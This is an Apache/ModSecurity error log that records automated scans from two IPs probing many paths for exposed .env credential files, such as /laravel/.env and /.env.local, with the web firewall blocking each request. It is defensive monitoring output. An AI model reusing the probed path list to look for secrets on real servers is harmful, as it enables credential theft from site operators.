[Thu Nov 27 08:08:47.709540 2025] [:error] [pid 354737] [client 52.59.210.188:55940] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSf4_3eYAxY_xo8wsP-UdwAAAAU"]
[Thu Nov 27 08:08:47.709766 2025] [:error] [pid 354737] [client 52.59.210.188:55940] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSf4_3eYAxY_xo8wsP-UdwAAAAU"]
[Thu Nov 27 08:08:47.779522 2025] [:error] [pid 353186] [client 52.59.210.188:55952] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSf4_yOJA5NFmjDGU5hICwAAAAI"]
[Thu Nov 27 08:08:47.779766 2025] [:error] [pid 353186] [client 52.59.210.188:55952] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSf4_yOJA5NFmjDGU5hICwAAAAI"]
[Thu Nov 27 08:08:47.779964 2025] [:error] [pid 353186] [client 52.59.210.188:55952] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSf4_yOJA5NFmjDGU5hICwAAAAI"]
[Thu Nov 27 08:08:47.851521 2025] [:error] [pid 353188] [client 52.59.210.188:55980] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSf4_z4fHjXDucK3GWvWbgAAAAQ"]
[Thu Nov 27 08:08:47.851757 2025] [:error] [pid 353188] [client 52.59.210.188:55980] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSf4_z4fHjXDucK3GWvWbgAAAAQ"]
[Thu Nov 27 08:08:47.851941 2025] [:error] [pid 353188] [client 52.59.210.188:55980] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSf4_z4fHjXDucK3GWvWbgAAAAQ"]
[Thu Nov 27 08:08:47.929992 2025] [:error] [pid 353184] [client 52.59.210.188:56008] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSf4_4G5PbbCKE0XPKZghAAAAAA"]
[Thu Nov 27 08:08:47.930317 2025] [:error] [pid 353184] [client 52.59.210.188:56008] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSf4_4G5PbbCKE0XPKZghAAAAAA"]
[Thu Nov 27 08:08:47.930655 2025] [:error] [pid 353184] [client 52.59.210.188:56008] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSf4_4G5PbbCKE0XPKZghAAAAAA"]
[Thu Nov 27 08:08:48.013483 2025] [:error] [pid 353185] [client 52.59.210.188:56040] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSf5AHTG8IrOxOxezX5AWAAAAAE"]
[Thu Nov 27 08:08:48.013703 2025] [:error] [pid 353185] [client 52.59.210.188:56040] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSf5AHTG8IrOxOxezX5AWAAAAAE"]
[Thu Nov 27 08:08:48.013895 2025] [:error] [pid 353185] [client 52.59.210.188:56040] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSf5AHTG8IrOxOxezX5AWAAAAAE"]
[Thu Nov 27 08:08:48.097816 2025] [:error] [pid 354740] [client 52.59.210.188:56070] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSf5ACz_tey498iHQ9agCgAAAAc"]
[Thu Nov 27 08:08:48.098034 2025] [:error] [pid 354740] [client 52.59.210.188:56070] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSf5ACz_tey498iHQ9agCgAAAAc"]
[Thu Nov 27 08:08:48.098208 2025] [:error] [pid 354740] [client 52.59.210.188:56070] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSf5ACz_tey498iHQ9agCgAAAAc"]
[Thu Nov 27 08:08:48.204063 2025] [:error] [pid 354739] [client 52.59.210.188:56098] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSf5AO_UStX-GTeIAe_urAAAAAY"]
[Thu Nov 27 08:08:48.204291 2025] [:error] [pid 354739] [client 52.59.210.188:56098] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSf5AO_UStX-GTeIAe_urAAAAAY"]
[Thu Nov 27 08:08:48.204465 2025] [:error] [pid 354739] [client 52.59.210.188:56098] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSf5AO_UStX-GTeIAe_urAAAAAY"]
[Thu Nov 27 08:08:48.297817 2025] [:error] [pid 354741] [client 52.59.210.188:56124] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSf5AM6T76P9_m8d0ivoZwAAAAg"]
[Thu Nov 27 08:08:48.298033 2025] [:error] [pid 354741] [client 52.59.210.188:56124] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSf5AM6T76P9_m8d0ivoZwAAAAg"]
[Thu Nov 27 08:08:48.298203 2025] [:error] [pid 354741] [client 52.59.210.188:56124] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSf5AM6T76P9_m8d0ivoZwAAAAg"]
[Thu Nov 27 08:08:48.378600 2025] [:error] [pid 353187] [client 52.59.210.188:56154] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSf5AHjjVMPW7zDRgsawFgAAAAM"]
[Thu Nov 27 08:08:48.378824 2025] [:error] [pid 353187] [client 52.59.210.188:56154] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSf5AHjjVMPW7zDRgsawFgAAAAM"]
[Thu Nov 27 08:08:48.379008 2025] [:error] [pid 353187] [client 52.59.210.188:56154] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSf5AHjjVMPW7zDRgsawFgAAAAM"]
[Fri Nov 28 01:41:32.171382 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSjvvOloDCfZueN0CD7L0gAAAAY"]
[Fri Nov 28 01:41:32.171631 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSjvvOloDCfZueN0CD7L0gAAAAY"]
[Fri Nov 28 01:41:32.171810 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSjvvOloDCfZueN0CD7L0gAAAAY"]
[Fri Nov 28 01:41:32.519736 2025] [:error] [pid 372557] [client 52.53.201.43:41022] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSjvvE0wq7X0ltslbJDksgAAAAE"]
[Fri Nov 28 01:41:32.519980 2025] [:error] [pid 372557] [client 52.53.201.43:41022] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSjvvE0wq7X0ltslbJDksgAAAAE"]
[Fri Nov 28 01:41:32.520164 2025] [:error] [pid 372557] [client 52.53.201.43:41022] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSjvvE0wq7X0ltslbJDksgAAAAE"]
[Fri Nov 28 01:41:32.524842 2025] [:error] [pid 372561] [client 52.53.201.43:41020] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSjvvCACLjvaROnzCGYAEwAAAA0"]
[Fri Nov 28 01:41:32.525025 2025] [:error] [pid 372561] [client 52.53.201.43:41020] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSjvvCACLjvaROnzCGYAEwAAAA0"]
[Fri Nov 28 01:41:32.525270 2025] [:error] [pid 372561] [client 52.53.201.43:41020] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSjvvCACLjvaROnzCGYAEwAAAA0"]
[Fri Nov 28 01:41:32.529621 2025] [authz_core:error] [pid 372609] [client 52.53.201.43:41024] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Fri Nov 28 01:41:33.585532 2025] [:error] [pid 372558] [client 52.53.201.43:41112] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSjvvV54T2cA32jY383rjQAAAAM"]
[Fri Nov 28 01:41:33.585809 2025] [:error] [pid 372558] [client 52.53.201.43:41112] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSjvvV54T2cA32jY383rjQAAAAM"]
[Fri Nov 28 01:41:33.586024 2025] [:error] [pid 372558] [client 52.53.201.43:41112] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSjvvV54T2cA32jY383rjQAAAAM"]
[Fri Nov 28 01:41:34.182624 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSjvvuloDCfZueN0CD7L0wAAAAY"]
[Fri Nov 28 01:41:34.182866 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSjvvuloDCfZueN0CD7L0wAAAAY"]
